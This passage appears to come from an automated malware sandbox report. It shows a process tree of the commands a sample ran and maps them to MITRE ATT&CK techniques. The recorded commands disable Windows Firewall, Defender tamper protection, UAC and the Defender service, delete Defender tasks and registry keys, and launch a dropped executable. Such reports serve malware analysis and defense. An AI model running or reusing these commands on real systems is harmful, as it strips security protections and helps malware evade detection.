  "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
  2⤵
  PID:3008
- - C:\Windows\system32\netsh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:2852
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  2⤵
  PID:644
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
  2⤵
  PID:2480
- - C:\Windows\system32\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config WinDefend start= disabled
  2⤵
  PID:568
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:2936
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
    3⤵
    PID:1776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:1152
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
    3⤵
    PID:2248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:2444
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
    3⤵
    PID:2132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:1296
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
    3⤵
    PID:940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable
  2⤵
  PID:2392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
  2⤵
  PID:2316
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
    3⤵
    PID:1008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
    3⤵
    PID:2520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:880
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2216
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
    3⤵
    PID:2512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
  2⤵
  PID:1428
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
    3⤵
    PID:1192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender-GUI | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1880

C:\Windows\system32\taskeng.exe
taskeng.exe {54C9CDDC-6173-40CA-8107-AB7038219980} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe
  C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe
  C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe
  2⤵
  - Executes dropped EXE
  PID:2572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19820705444390036561406183925-18011079201114178973-10028322151495794347-472333905"
1⤵
PID:1896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "253123786697034217-1327692320-1943706239-947321483-1903392967-1050931449-622918196"
1⤵
PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry